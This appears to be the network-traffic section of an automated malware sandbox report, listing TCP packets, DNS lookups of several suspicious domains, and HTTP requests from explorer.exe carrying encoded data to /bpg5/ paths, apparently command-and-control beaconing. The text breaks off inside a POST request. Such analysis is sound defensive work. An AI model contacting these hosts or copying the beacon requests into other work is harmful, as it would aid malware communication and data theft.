                                                    May 19, 2023 17:52:13.655170918 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.655170918 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.655179024 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.655193090 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.655215025 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.655222893 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.655235052 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.655256033 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.655263901 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.655296087 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.655328989 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.655380964 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.655412912 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.655422926 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.655436039 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.655489922 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.941581011 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941617966 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941639900 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941662073 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941682100 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941701889 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941704988 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.941724062 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941745996 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.941745996 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941766977 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941787958 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941796064 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.941808939 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941832066 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941833019 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.941853046 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941873074 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.941874981 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941895008 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941911936 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.941914082 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941936016 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941952944 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.941956043 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941976070 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.941991091 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.941998959 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942020893 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942055941 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942293882 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942329884 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942352057 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942363977 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942373037 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942414045 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942420006 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942435980 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942460060 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942472935 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942481995 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942503929 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942526102 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942528963 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942548037 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942553043 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942611933 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942620993 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942641020 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942682028 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942735910 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942756891 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942781925 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942804098 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942814112 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942827940 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942848921 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:13.942857981 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:13.942902088 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:14.226919889 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.226969004 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.226999044 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227025032 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227051020 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227077961 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227102995 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227129936 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227129936 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:14.227205038 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:14.227205038 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:14.227278948 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227353096 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227380037 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227437019 CEST8049710118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:14.227436066 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:14.227497101 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:14.480660915 CEST4971080192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:15.489308119 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:15.766880989 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:15.767409086 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:15.788387060 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.067895889 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163568974 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163624048 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163659096 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163693905 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163722992 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.163753033 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163788080 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163788080 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.163817883 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163836956 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.163855076 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163889885 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.163942099 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.164182901 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.164613008 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.441699982 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441740990 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441762924 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441787004 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441808939 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441828012 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441843033 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441855907 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441869020 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441879988 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.441883087 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441898108 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.441952944 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.441988945 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.442013025 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.442034006 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.442048073 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.442051888 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.442070007 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.442073107 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.442095995 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.442118883 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.442137003 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.442157030 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.442215919 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.442250013 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.442291975 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.720911980 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.720957994 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.720989943 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721021891 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721051931 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721071005 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721088886 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721120119 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721147060 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721154928 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721173048 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721185923 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721215963 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721216917 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721256971 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721275091 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721290112 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721322060 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721338987 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721352100 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721381903 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721400023 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721412897 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721441984 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721468925 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721471071 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721502066 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721514940 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721533060 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721564054 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721576929 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721594095 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721622944 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721642971 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721652031 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721683025 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721703053 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721713066 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721743107 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721771955 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721772909 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721803904 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721818924 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721834898 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721864939 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721879959 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721898079 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721926928 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721946001 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.721957922 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.721990108 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.722007036 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.722021103 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.722049952 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.722074986 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.722168922 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.722198009 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.722234964 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.769433975 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:16.999952078 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:16.999986887 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000009060 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000029087 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000056982 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000072002 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:17.000083923 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000108004 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000112057 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:17.000129938 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000152111 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000164032 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:17.000175953 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000199080 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:17.000202894 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000225067 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000232935 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:17.000246048 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000264883 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000281096 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:17.000283957 CEST8049711118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:17.000328064 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:17.000360012 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:17.300875902 CEST4971180192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:18.317634106 CEST4971280192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:18.600002050 CEST8049712118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:18.600120068 CEST4971280192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:18.600258112 CEST4971280192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:18.883424997 CEST8049712118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:18.944601059 CEST8049712118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:18.944643021 CEST8049712118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:18.944864988 CEST4971280192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:18.945126057 CEST4971280192.168.2.4118.27.125.172
                                                    May 19, 2023 17:52:19.224289894 CEST8049712118.27.125.172192.168.2.4
                                                    May 19, 2023 17:52:24.251928091 CEST4971380192.168.2.4183.90.228.46
                                                    May 19, 2023 17:52:24.528314114 CEST8049713183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:24.528518915 CEST4971380192.168.2.4183.90.228.46
                                                    May 19, 2023 17:52:24.544229031 CEST4971380192.168.2.4183.90.228.46
                                                    May 19, 2023 17:52:24.819962025 CEST8049713183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:24.819994926 CEST8049713183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:24.821749926 CEST8049713183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:24.821774960 CEST8049713183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:24.821793079 CEST8049713183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:24.825381994 CEST4971380192.168.2.4183.90.228.46
                                                    May 19, 2023 17:52:26.051529884 CEST4971380192.168.2.4183.90.228.46
                                                    May 19, 2023 17:52:36.615082979 CEST4971480192.168.2.4183.90.228.46
                                                    May 19, 2023 17:52:36.903556108 CEST8049714183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:36.907000065 CEST4971480192.168.2.4183.90.228.46
                                                    May 19, 2023 17:52:36.907072067 CEST4971480192.168.2.4183.90.228.46
                                                    May 19, 2023 17:52:37.195724010 CEST8049714183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:37.197174072 CEST8049714183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:37.197223902 CEST8049714183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:37.197257042 CEST8049714183.90.228.46192.168.2.4
                                                    May 19, 2023 17:52:37.197350025 CEST4971480192.168.2.4183.90.228.46

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    May 19, 2023 17:51:10.466887951 CEST5223953192.168.2.48.8.8.8
                                                    May 19, 2023 17:51:10.513945103 CEST53522398.8.8.8192.168.2.4
                                                    May 19, 2023 17:51:21.150405884 CEST5680753192.168.2.48.8.8.8
                                                    May 19, 2023 17:51:21.188350916 CEST53568078.8.8.8192.168.2.4
                                                    May 19, 2023 17:51:31.983046055 CEST6100753192.168.2.48.8.8.8
                                                    May 19, 2023 17:51:32.060442924 CEST53610078.8.8.8192.168.2.4
                                                    May 19, 2023 17:51:43.630021095 CEST6068653192.168.2.48.8.8.8
                                                    May 19, 2023 17:51:43.664450884 CEST53606868.8.8.8192.168.2.4
                                                    May 19, 2023 17:51:53.864764929 CEST6112453192.168.2.48.8.8.8
                                                    May 19, 2023 17:51:54.045301914 CEST53611248.8.8.8192.168.2.4
                                                    May 19, 2023 17:51:59.457873106 CEST5944453192.168.2.48.8.8.8
                                                    May 19, 2023 17:51:59.639744043 CEST53594448.8.8.8192.168.2.4
                                                    May 19, 2023 17:52:02.166583061 CEST5557053192.168.2.48.8.8.8
                                                    May 19, 2023 17:52:02.346879959 CEST53555708.8.8.8192.168.2.4
                                                    May 19, 2023 17:52:09.376785040 CEST6490653192.168.2.48.8.8.8
                                                    May 19, 2023 17:52:09.655333042 CEST53649068.8.8.8192.168.2.4
                                                    May 19, 2023 17:52:23.961267948 CEST5944653192.168.2.48.8.8.8
                                                    May 19, 2023 17:52:24.237963915 CEST53594468.8.8.8192.168.2.4

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    May 19, 2023 17:51:10.466887951 CEST192.168.2.48.8.8.80x68dbStandard query (0)www.berlinhealthweek.comA (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:21.150405884 CEST192.168.2.48.8.8.80xc3d9Standard query (0)www.musicandgros.comA (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:31.983046055 CEST192.168.2.48.8.8.80x92c3Standard query (0)www.gomarketing.infoA (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:43.630021095 CEST192.168.2.48.8.8.80xd3f3Standard query (0)www.antalyabfe.comA (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:53.864764929 CEST192.168.2.48.8.8.80x1c79Standard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:59.457873106 CEST192.168.2.48.8.8.80x3deStandard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                                    May 19, 2023 17:52:02.166583061 CEST192.168.2.48.8.8.80xdbe7Standard query (0)www.jhg61.comA (IP address)IN (0x0001)false
                                                    May 19, 2023 17:52:09.376785040 CEST192.168.2.48.8.8.80xf3b1Standard query (0)www.rt66omm.comA (IP address)IN (0x0001)false
                                                    May 19, 2023 17:52:23.961267948 CEST192.168.2.48.8.8.80x4cb3Standard query (0)www.haynicorpon.bizA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    May 19, 2023 17:51:10.513945103 CEST8.8.8.8192.168.2.40x68dbNo error (0)www.berlinhealthweek.com130.185.109.77A (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:21.188350916 CEST8.8.8.8192.168.2.40xc3d9No error (0)www.musicandgros.commusicandgros.comCNAME (Canonical name)IN (0x0001)false
                                                    May 19, 2023 17:51:21.188350916 CEST8.8.8.8192.168.2.40xc3d9No error (0)musicandgros.com81.169.145.93A (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:32.060442924 CEST8.8.8.8192.168.2.40x92c3No error (0)www.gomarketing.info198.177.124.57A (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:43.664450884 CEST8.8.8.8192.168.2.40xd3f3No error (0)www.antalyabfe.com188.114.97.7A (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:43.664450884 CEST8.8.8.8192.168.2.40xd3f3No error (0)www.antalyabfe.com188.114.96.7A (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:54.045301914 CEST8.8.8.8192.168.2.40x1c79No error (0)www.jhg61.com150.129.40.9A (IP address)IN (0x0001)false
                                                    May 19, 2023 17:51:59.639744043 CEST8.8.8.8192.168.2.40x3deNo error (0)www.jhg61.com150.129.40.9A (IP address)IN (0x0001)false
                                                    May 19, 2023 17:52:02.346879959 CEST8.8.8.8192.168.2.40xdbe7No error (0)www.jhg61.com150.129.40.9A (IP address)IN (0x0001)false
                                                    May 19, 2023 17:52:09.655333042 CEST8.8.8.8192.168.2.40xf3b1No error (0)www.rt66omm.com118.27.125.172A (IP address)IN (0x0001)false
                                                    May 19, 2023 17:52:24.237963915 CEST8.8.8.8192.168.2.40x4cb3No error (0)www.haynicorpon.biz183.90.228.46A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.berlinhealthweek.com
                                                    • www.musicandgros.com
                                                    • www.gomarketing.info
                                                    • www.antalyabfe.com
                                                    • www.jhg61.com
                                                    • www.rt66omm.com
                                                    • www.haynicorpon.biz

                                                    HTTP Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    0192.168.2.449697130.185.109.7780C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:10.548851013 CEST32OUTGET /bpg5/?JBfKk=_uLb4J-vJhW8&8mBWmPn=MtyGvtjXetI/I8tDbK2owBF5n98UCX/xugphV/8mPC2YbHujdbNXelvuFR4JIdJe4QTgQSn6m54tdOdmKx2lgF7dehg5lWobVA== HTTP/1.1
                                                    Host: www.berlinhealthweek.com
                                                    Connection: close
                                                    Data Raw: 00 00 00 00 00 00 00
                                                    Data Ascii:
                                                    May 19, 2023 17:51:10.568217039 CEST33INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.6.2
                                                    Date: Fri, 19 May 2023 15:51:10 GMT
                                                    Content-Type: text/html
                                                    Content-Length: 168
                                                    Connection: close
                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                    Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>


                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                    1192.168.2.44969881.169.145.9380C:\Windows\explorer.exe
                                                    TimestampkBytes transferredDirectionData
                                                    May 19, 2023 17:51:21.221126080 CEST35OUTPOST /bpg5/ HTTP/1.1
                                                    Host: www.musicandgros.com
                                                    Connection: close
                                                    Content-Length: 1485
                                                    Cache-Control: no-cache
                                                    Origin: http://www.musicandgros.com
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.musicandgros.com/bpg5/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
